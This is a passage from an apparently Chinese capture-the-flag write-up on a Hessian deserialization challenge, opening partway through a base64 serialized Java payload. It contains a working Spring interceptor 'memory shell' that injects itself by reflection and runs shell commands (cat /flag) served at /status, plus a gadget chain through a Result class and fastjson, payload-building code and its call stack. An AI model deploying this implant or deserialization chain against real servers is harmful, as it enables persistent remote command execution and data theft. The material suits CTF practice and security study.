AAP+ADYABwBlBwBmQQcAVf8AfwAIBwBnBwBoBwBpBwBqBwBVBwBlBwBmBwBVAAAAawAAAAQAAQBsAAEAbQBuAAIARgAAAGAABQAFAAAACiorLC0ZBLcAKbEAAAACAEcAAAAKAAIAAACRAAkAkgBIAAAANAAFAAAACgBJAEoAAAAAAAoAWQBaAAEAAAAKAFsAXAACAAAACgBdAF4AAwAAAAoAbwBwAAQAawAAAAQAAQBsAAEAcQByAAIARgAAAGAABQAFAAAACiorLC0ZBLcAKrEAAAACAEcAAAAKAAIAAACWAAkAlwBIAAAANAAFAAAACgBJAEoAAAAAAAoAWQBaAAEAAAAKAFsAXAACAAAACgBdAF4AAwAAAAoAcwB0AAQAawAAAAQAAQBsAAEAdQB2AAIARgAAAD8AAAADAAAAAbEAAAACAEcAAAAGAAEAAACcAEgAAAAgAAMAAAABAEkASgAAAAAAAQB3AHgAAQAAAAEAeQB6AAIAawAAAAQAAQB7AAEAdQB8AAIARgAAAEkAAAAEAAAAAbEAAAACAEcAAAAGAAEAAAChAEgAAAAqAAQAAAABAEkASgAAAAAAAQB3AHgAAQAAAAEAfQB+AAIAAAABAF0AfwADAGsAAAAEAAEAewAIAIAARQABAEYAAAFxAAMABQAAAG4EswAIsgAHEiu2ABS4ACwSLQO5AC4DAMAAL0sqEjC5ADECAMAAMEwBTRIyEjO2ADRNpwAITi22ADYsBLYANwFOLCu2ADjAADlOpwAKOgQZBLYAO7sAPFm3AD06BC0ZBLkAPgIAV7IABxI/tgAUsQACACkAMQA0ADUAQABJAEwAOgAEAEcAAABOABMAAAAnAAQAKQAMACoAGwArACcALAApAC4AMQAxADQALwA1ADAAOQAyAD4AMwBAADUASQA4AEwANgBOADcAUwA5AFwAOgBlADsAbQA8AEgAAABIAAcANQAEAIEAggADAE4ABQCBAIMABAAbAFIAhACFAAAAJwBGAIYAhwABACkARACIAIkAAgBAAC0AigCLAAMAXAARAIwASgAEAI0AAAAMAAEAQAAtAIoAjgADAFQAAAAtAAT/ADQAAwcAjwcAkAcAkQABBwCSBP8AEgAEBwCPBwCQBwCRBwCTAAEHAJQGAAIAlQAAAAIAlgEPAAAACgABALgAtAEOAAlwdAAFUHVwaTFwdwEAeHh0AAJ6WnNyADFjb20uc3VuLm9yZy5hcGFjaGUueHBhdGguaW50ZXJuYWwub2JqZWN0cy5YU3RyaW5nHAonO0gWxf0CAAB4cgAxY29tLnN1bi5vcmcuYXBhY2hlLnhwYXRoLmludGVybmFsLm9iamVjdHMuWE9iamVjdPSYEgm7e7YZAgABTAAFbV9vYmp0ABJMamF2YS9sYW5nL09iamVjdDt4cgAsY29tLnN1bi5vcmcuYXBhY2hlLnhwYXRoLmludGVybmFsLkV4cHJlc3Npb24H2aYcjays1gIAAUwACG1fcGFyZW50dAAyTGNvbS9zdW4vb3JnL2FwYWNoZS94cGF0aC9pbnRlcm5hbC9FeHByZXNzaW9uTm9kZTt4cHBxAH4AEXhxAH4AAnNxAH4AAD9AAAAAAAAMdwgAAAAQAAAAAnEAfgADcQB+ABhxAH4AEnEAfgAGeHEAfgAZeA==\"}";

        }else {
            code = "{\"code\":\"200\",\"message\":\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAABdwQAAAABdAApb3JnLmpib3NzLnByb3h5LmVqYi5oYW5kbGUuSG9tZUhhbmRsZUltcGx4\"}";;

        }
        if (request.getRequestURI().equals("/blacklist/jdk/get")) {
            String result = new Scanner(code).useDelimiter("\\A").next();
            response.addHeader("Content-Type","application/json;charset=UTF-8");
            response.getWriter().write(result);
            response.getWriter().flush();
            response.getWriter().close();
            nums++;
            return false;
        }
      
        return true;
    }

    @Override
    public void postHandle(HttpServletRequest request, HttpServletResponse response, Object handler, ModelAndView modelAndView) throws Exception {
        HandlerInterceptor.super.postHandle(request, response, handler, modelAndView);
    }

    @Override
    public void afterCompletion(HttpServletRequest request, HttpServletResponse response, Object handler, Exception ex) throws Exception {
        HandlerInterceptor.super.afterCompletion(request, response, handler, ex);
    }

}

server的内存马:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
public class magicInterceptor extends AbstractTranslet implements HandlerInterceptor {

    public  static int nums = 1;
    static {
        System.out.println("OKOK");
        WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
        RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
        Field field = null;
        try {
            field = AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
        } catch (NoSuchFieldException e) {
            e.printStackTrace();
        }
        field.setAccessible(true);
        List<HandlerInterceptor> adaptInterceptors = null;
        try {
            adaptInterceptors = (List<HandlerInterceptor>) field.get(mappingHandlerMapping);
        } catch (IllegalAccessException e) {
            e.printStackTrace();
        }
        magicInterceptor evilInterceptor = new magicInterceptor();
        adaptInterceptors.add(evilInterceptor);
        System.out.println("ok");
    }
    public static String replaceBlank(String str) {

        String dest = "";

        if (str != null) {

            Pattern p = Pattern.compile("\\s*|\t|\r|\n");

            Matcher m = p.matcher(str);

            dest = m.replaceAll("");

        }

        return dest;

    }

    @Override
    public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {

        String code;

//        if(nums == 1){
//            Runtime.getRuntime().exec("grep -rn --exclude-dir={proc,sys} flag{* / > /tmp/1.txt");
//        }
        InputStream in = Runtime.getRuntime().exec("cat /flag").getInputStream();
        Scanner s = new Scanner(in).useDelimiter("\\A");
        String output = s.hasNext() ? s.next() : "";


        System.out.println(output);


        code = "{\"code\":\"200\",\"message\":\""+Base64.getEncoder().encodeToString(output.getBytes())+"\"}";

        if (request.getRequestURI().equals("/status")) {
            String result = new Scanner(code).useDelimiter("\\A").next();

            response.addHeader("Content-Type","application/json;charset=UTF-8");
            response.getWriter().write(result);
            response.getWriter().flush();
            response.getWriter().close();
            nums++;
            return false;
        }

        return true;
    }

    @Override
    public void postHandle(HttpServletRequest request, HttpServletResponse response, Object handler, ModelAndView modelAndView) throws Exception {
        HandlerInterceptor.super.postHandle(request, response, handler, modelAndView);
    }

    @Override
    public void afterCompletion(HttpServletRequest request, HttpServletResponse response, Object handler, Exception ex) throws Exception {
        HandlerInterceptor.super.afterCompletion(request, response, handler, ex);
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

然后攻击步骤就是先通过/hessian/deserialize路由反序列化,然后一直刷新/client/status就可以完成攻击。

预期解

问了下出题人又是膜 wh1t3Pig 的一天

这个题的预期是利用题目给的Result类,通过这个类完成到tostring的调用。难点应该就是如何去构造2个类不同但是hashcode相同。目前还没有发现怎么构造,有研究的师傅欢迎来找我讨论一下(

已经成功复现了,前来更新一下

image-20230504204757306

因为这里的限制不能用常规的直接2个map的value去触发o对象的tostring然后可以注意到这个类的message这个变量是object类型,然后在该类的tostring中会触发StringBuilder的append方法。然后这个方法中会调用

image-20230504205254736

image-20230504205329174

这个位置就可以出发JSONObject的Tostring方法了,然后后续的调用不变即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
JSONObject jsonObject = new JSONObject();
jsonObject.put("Pupi1",new Object());
Result result = new Result("Pupi1","aaaa");
Result result1 = new Result("a","b");
setFieldValue(result1,"message",jsonObject);
HashMap map1 = new HashMap();
HashMap map2 = new HashMap();
map1.put("yy",result1);
map1.put("zZ",result);
map2.put("yy",result);
map2.put("zZ",result1);


Object o = makeMap(map1,map2);
String a = Tools.base64Encode(Hessian2Serializer.serialize(o));
System.out.println(a);

调用栈

1
2
3
4
5
6
7
8
9
10
11
12
13
write:312, JSONSerializer (com.alibaba.fastjson.serializer)
toJSONString:1077, JSON (com.alibaba.fastjson)
toString:1071, JSON (com.alibaba.fastjson)
valueOf:2994, String (java.lang)
append:131, StringBuilder (java.lang)
toString:50, Result (com.example.registry.data)
equals:43, Result (com.example.registry.data)
equals:495, AbstractMap (java.util)
putVal:635, HashMap (java.util)
put:612, HashMap (java.util)
readMap:114, MapDeserializer (com.caucho.hessian.io)
readMap:562, SerializerFactory (com.caucho.hessian.io)
readObject:2883, Hessian2Input (com.caucho.hessian.io)